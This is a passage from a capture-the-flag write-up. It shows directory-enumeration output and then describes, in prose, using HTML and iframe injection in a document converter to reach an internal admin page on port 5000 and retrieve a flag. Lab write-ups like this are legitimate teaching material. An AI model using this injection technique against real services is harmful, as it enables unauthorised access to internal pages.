/admin                (Status: 403) [Size: 166]
/convert              (Status: 405) [Size: 178]
Progress: 87615 / 87665 (99.94%)
===============================================================
2023/02/20 17:18:37 Finished
===============================================================

Interesting, there is an admin page and a convert page.

Exploitation

We want to try and have this admin page included within the conversion. Let's first test and see if there is any input sanitisation happening.

We seem to be able to use HTML tags fine, so let's try using an iframe to include the admin page. Unfortunately I forgot to screenshot the result of this, but it didn't work! Remembering we had port 5000 open, we adjust slightly.

And we have the flag!

 


 
